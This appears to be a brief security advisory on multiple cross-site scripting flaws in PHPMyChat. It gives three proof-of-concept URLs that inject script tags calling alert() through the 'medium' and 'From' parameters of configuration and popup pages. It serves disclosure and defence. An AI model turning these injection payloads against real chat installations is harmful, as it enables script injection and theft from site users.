PHPMyChat Multiple Cross-Site Scripting Vulnerabilities

PHPMyChat Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof-of-concept URIs are available:

http://www.example.com/phpmychat/chat/config/start_page.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1
http://www.example.com/phpmychat/chat/config/style.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1
http://www.example.com/phpmychat/chat/users_popupL.php?From="><script>alert(29837274289742472);</script>>&L=english&LastCheck=1133281246&B=0